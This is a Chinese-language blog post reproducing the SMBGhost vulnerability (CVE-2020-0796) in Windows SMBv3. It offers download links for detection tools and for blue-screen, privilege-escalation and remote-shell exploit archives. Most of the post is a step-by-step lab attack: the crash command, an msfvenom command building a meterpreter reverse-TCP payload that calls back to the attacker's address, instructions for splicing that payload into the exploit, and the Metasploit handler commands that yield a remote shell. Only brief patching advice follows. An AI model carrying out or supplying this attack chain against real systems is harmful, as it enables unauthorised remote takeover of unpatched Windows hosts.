文章最后更新时间为:2021 年 06 月 04 日 09:32:48 Loading... ## 漏洞简介 ## 漏洞公告显示,SMB 3.1.1协议中处理压缩消息时,对其中数据没有经过安全检查,直接使用会引发内存破坏漏洞,可能被攻击者利用远程执行任意代码。攻击者利用该漏洞无须权限即可实现远程代码执行,受黑客攻击的目标系统只需开机在线即可能被入侵。 ## 漏洞影响范围 ## Windows 10 Version 1903 for 32-bit Systems Windows 10 Version 1903 for x64-based Systems Windows 10 Version 1903 for ARM64-based Systems Windows Server, Version 1903 (Server Core installation) Windows 10 Version 1909 for 32-bit Systems Windows 10 Version 1909 for x64-based Systems Windows 10 Version 1909 for ARM64-based Systems Windows Server, Version 1909 (Server Core installation) ## 漏洞检测 ## 奇安信的检测工具:<button class="btn m-b-xs btn-success " onclick='window.open("https://gitee.com/r3387/wenyu/raw/master/%EF%BC%88cve-2020-0796%EF%BC%9/%E6%A3%80%E6%B5%8B/CVE-2020-0796-Scanner.zip","_blank")'>点击下载</button> ![奇安信永恒之黑检测][1] github的某脚本:<button class="btn m-b-xs btn-success " onclick='window.open("https://gitee.com/r3387/wenyu/raw/master/%EF%BC%88cve-2020-0796%EF%BC%89/%E6%A3%80%E6%B5%8B/SMBGhost-master.zip","_blank")'>点击下载</button> ![github脚本检测][2] ## POC地址 ## 蓝屏攻击<button class="btn m-b-xs btn-success " onclick='window.open("https://gitee.com/r3387/wenyu/raw/master/%EF%BC%88cve-2020-0796%EF%BC%89/exp%E5%A4%8D%E7%8E%B0/CVE-2020-0796-PoC-master.zip","_blank")'>点击下载</button> 本地提权<button class="btn m-b-xs btn-success " onclick='window.open("https://gitee.com/r3387/wenyu/raw/master/%EF%BC%88cve-2020-0796%EF%BC%89/exp%E5%A4%8D%E7%8E%B0/cve-2020-0796-local_static.zip","_blank")'>点击下载</button> 远程执行shell<button class="btn m-b-xs btn-success " onclick='window.open("https://gitee.com/r3387/wenyu/raw/master/%EF%BC%88cve-2020-0796%EF%BC%89/exp%E5%A4%8D%E7%8E%B0/SMBGhost_RCE_PoC-master.zip","_blank")'>点击下载</button> ## 复现 ## 攻击机 kali 192.168.23.140 靶机 win10 192.168.23.139 关闭win10fang'huo'q - **蓝屏复现** 解压蓝屏攻击POC: ![解压POC压缩包][3] 执行命令: > python3 CVE-2020-0796.py 192.168.23.139 执行成功,win10蓝屏 ![win10蓝屏][4] - **本地提权** 运行本地提权POC 成功后会打开system权限的窗口 ![system权限窗口][5] - **远程执行shell复现** 解压远程执行shellPOC: ![解压远程执行shellPOC][6] **1.生成反向链接木马** > msfvenom -a x64 --platform windows -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.23.140 LPORT=6666 -f python -o shell.txt 等待成功后,会生成一个shell.txt文件, ![生成shell.txt文件][7] **2.修改exp** 把shell.txt文件里的buf替换成USER_PAYLOAD ![buf替换为USER_PAYLOAD][8] 然后打开exploit.py文件,把下面红圈里的内容换成修改后的shell.txt的内容 ![替换内容][9] 保存。 **3.msf监听** 打开msf > msfconsole > msf5 > use exploit/multi/handler > msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp > msf5 exploit(multi/handler) > set lhost 192.168.23.140 > msf5 exploit(multi/handler) > set lport 6666 > msf5 exploit(multi/handler) > run 然后另开终端,运行POC > python3 exploit.py -ip 192.168.23.139 等待运行成功,拿到shell ![成功拿到shell][10] ## 漏洞处理 ## 1.及时更新微软针对该漏洞所发布的的修复补丁 2.关闭445端口 [1]: https://gitee.com/r3387/wenyu/raw/master/%EF%BC%88cve-2020-0796%EF%BC%89/%E6%A3%80%E6%B5%8B/1.PNG [2]: https://gitee.com/r3387/wenyu/raw/master/%EF%BC%88cve-2020-0796%EF%BC%89/%E6%A3%80%E6%B5%8B/2.PNG [3]: https://gitee.com/r3387/wenyu/raw/master/%EF%BC%88cve-2020-0796%EF%BC%89/exp%E5%A4%8D%E7%8E%B0/1.PNG [4]: https://gitee.com/r3387/wenyu/raw/master/%EF%BC%88cve-2020-0796%EF%BC%89/exp%E5%A4%8D%E7%8E%B0/2.PNG [5]: https://gitee.com/r3387/wenyu/raw/master/%EF%BC%88cve-2020-0796%EF%BC%89/exp%E5%A4%8D%E7%8E%B0/7.PNG [6]: https://gitee.com/r3387/wenyu/raw/master/%EF%BC%88cve-2020-0796%EF%BC%89/exp%E5%A4%8D%E7%8E%B0/3.PNG [7]: https://gitee.com/r3387/wenyu/raw/master/%EF%BC%88cve-2020-0796%EF%BC%89/exp%E5%A4%8D%E7%8E%B0/4.PNG [8]: https://gitee.com/r3387/wenyu/raw/master/%EF%BC%88cve-2020-0796%EF%BC%89/exp%E5%A4%8D%E7%8E%B0/5.PNG [9]: https://gitee.com/r3387/wenyu/raw/master/%EF%BC%88cve-2020-0796%EF%BC%89/exp%E5%A4%8D%E7%8E%B0/6.PNG [10]: https://gitee.com/r3387/wenyu/raw/master/%EF%BC%88cve-2020-0796%EF%BC%89/exp%E5%A4%8D%E7%8E%B0/8.PNG Last modification:June 4, 2021 © Allow specification reprint Support Appreciate the author Like 1 如果觉得我的文章对你有用,请随意赞赏